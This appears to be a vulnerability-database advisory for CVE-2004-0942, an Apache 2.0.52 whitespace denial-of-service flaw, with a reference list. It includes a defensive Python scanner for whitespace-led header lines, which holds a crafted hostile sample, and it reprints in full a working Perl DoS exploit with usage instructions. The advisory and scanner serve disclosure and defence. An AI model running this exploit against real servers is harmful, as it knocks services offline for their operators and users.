Apache Web Server Whitespace Handling Remote Denial of Service Vulnerability

Vulnerability ID 1108499 Vulnerability type
Published 2005-03-04 Updated 2005-10-20
CVE ID CVE-2004-0942
CNNVD-ID CNNVD-200502-041
Platform Multiple CVSS score 5.0
|Source
https://www.exploit-db.com/exploits/855
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-041
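|Vulnerability Details
Apache Web Server is an HTTP server program. Apache Web Server does not correctly handle requests that contain multiple space characters, and a remote attacker can exploit this vulnerability to carry out a denial-of-service attack against the server. Chintan Trivedi reported that a remote attacker can send multiple specially crafted HTTP GET requests containing multiple space characters, causing the web server to consume a large amount of resources and resulting in a denial of service. The vendor later reported that field length limits do not adequately prevent the harm caused by some malicious requests.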
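An added example, not from the advisory or from Apache's code: a streaming check that a proxy or test harness could run on the head of each request, counting lines that begin with a space or tab and rejecting the request once they exceed a budget, without buffering the whole request. The names `FoldGuard` and `scan` and both thresholds are assumptions chosen for illustration.

```python
# Added example: stream-scan an HTTP request head and stop reading once
# whitespace-led lines exceed a budget. Thresholds are assumed policy values.
SP, HTAB, CR, LF = 0x20, 0x09, 0x0D, 0x0A

class FoldGuard:
    def __init__(self, max_fold_lines=16, max_fold_bytes=16384):
        self.max_fold_lines = max_fold_lines
        self.max_fold_bytes = max_fold_bytes
        self.fold_lines = 0          # lines that begin with SP/HTAB
        self.fold_bytes = 0          # bytes carried by those lines
        self.seen_request_line = False
        self.line_len = 0            # bytes in the current line, CR/LF excluded
        self.in_fold = False
        self.verdict = None          # None = need more data, else "ok"/"reject"

    def feed(self, chunk: bytes):
        """Consume one chunk; return the verdict as soon as it is known."""
        for b in chunk:
            if self.verdict:
                break
            if b == CR:
                continue
            if b == LF:
                if self.line_len == 0 and self.seen_request_line:
                    self.verdict = "ok"      # blank line: header section ended
                elif self.line_len > 0:
                    self.seen_request_line = True
                self.line_len, self.in_fold = 0, False
                continue
            if self.line_len == 0 and self.seen_request_line and b in (SP, HTAB):
                self.in_fold = True          # line starts with whitespace
                self.fold_lines += 1
            self.line_len += 1
            if self.in_fold:
                self.fold_bytes += 1
                over_lines = self.fold_lines > self.max_fold_lines
                if over_lines or self.fold_bytes > self.max_fold_bytes:
                    self.verdict = "reject"
        return self.verdict

def scan(raw: bytes, chunk_size=4096):
    guard = FoldGuard()              # feed in chunks, as a socket loop would
    for i in range(0, len(raw), chunk_size):
        if guard.feed(raw[i:i + chunk_size]):
            break
    return guard

# Constructed samples: one legitimately folded header, and a head made of space-only lines.
BENIGN = b"GET / HTTP/1.1\r\nHost: example.test\r\nX-Note: part one\r\n part two\r\n\r\n"
HOSTILE = b"GET / HTTP/1.0\n" + (b" " * 8000 + b"\n") * 50
```

A request that ends with the verdict still `None` is incomplete and should remain subject to the usual read timeout.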
|Exploit
#!/usr/bin/perl

# Based on -> 
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added feature with which we can exploit Apache web servers on Windows systems. For it you should experiment
#             with the [trys] parameter of this code.
#             
#             By default parameter trys = 8000; to DoS Apache web servers on Windows systems try to 
#             increase this parameter.
#
#             For example, in my system I have 256Mb of RAM. To DoS Apache web servers I run this exploit like this
#
#             C:perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->    
#           
#             If the progress bar does not respond, the server may already be DoSeD. Try to open a web page hosted on this web server.
#             And if you see "Error 500" you are a lucky man :)
#
# Warnings -> 
#             This is POC code; you can use it only on your own servers. The writer is not responsible if you damage your servers or
#             use it for attack, or other things.  
#
# Shit -> 
#             My English now is bulls shit :( I try study it :)
#            

# Tested under Windows 2000 SP4 with Apache 2.0.49 (Win)

# Greets fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";    
  
  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";    
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n"); 

   
      if ($i % 500 == 0)
        { 
         print "=";
        }  

     ++$i;

    } until ($i == $trys); 


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n"; 

# milw0rm.com [2005-03-04]
|References

Source: XF
Name: apache-http-get-dos(17930)
Link: http://xforce.iss.net/xforce/xfdb/17930
Source: HP
Name: HPSBUX01123
Link: http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123
Source: TRUSTIX
Name: 2004-0061
Link: http://www.trustix.org/errata/2004/0061/
Source: HP
Name: SSRT4876
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110384374213596&w=2
Source: FULLDISC
Name: 20041101 DoS in Apache 2.0.52?
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/028248.html
Source: REDHAT
Name: RHSA-2004:562
Link: http://www.redhat.com/support/errata/RHSA-2004-562.html
Source: MANDRAKE
Name: MDKSA-2004:135
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2004:135
Source: VUPEN
Name: ADV-2006-0789
Link: http://www.frsirt.com/english/advisories/2006/0789
Source: support.avaya.com
Link: http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
Source: SUNALERT
Name: 102198
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
Source: SECUNIA
Name: 19072
Link: http://secunia.com/advisories/19072
Source: APPLE
Name: APPLE-SA-2005-08-15
Link: http://lists.apple.com
